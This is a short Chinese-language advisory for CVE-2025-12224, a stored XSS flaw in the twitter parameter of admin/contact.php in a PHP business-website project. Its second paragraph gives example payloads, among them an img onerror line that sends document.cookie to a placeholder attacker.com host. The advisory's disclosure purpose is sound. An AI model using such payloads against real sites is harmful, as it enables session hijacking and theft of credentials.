CVE-2025-12224CVE-2025-12224是存在于Iqbolshoh php-business-website项目中的一个存储型跨站脚本(Stored XSS)漏洞。该漏洞存在于admin/contact.php文件中的twitter参数处理逻辑中,攻击者可以通过构造恶意脚本代码并提交到该参数,当其他用户访问或管理员查看相关数据时,恶意脚本将在受害者浏览器中执行。这可能导致会话劫持、敏感信息窃取、钓鱼攻击等安全问题。由于该产品采用滚动发布模型,具体的版本号信息暂不可用,厂商也未对此漏洞披露做出回应。建议用户检查自身部署的代码是否受影响,并采取相应的安全措施。
该漏洞为存储型XSS漏洞,存在于admin/contact.php文件中。当处理twitter参数时,应用程序未对用户输入进行充分的HTML实体转义或输入验证。攻击者可以在twitter字段中注入恶意JavaScript代码,如<script>alert(document.cookie)</script>或<img src=x onerror=fetch('https://attacker.com/steal?cookie='+document.cookie)>等payload。提交的恶意数据会被存储在数据库或后端,当其他用户访问展示该数据的页面时,浏览器会解析并执行注入的脚本代码。由于漏洞位于管理后台的contact.php文件,攻击成功后可能获取管理员权限或窃取敏感会话信息。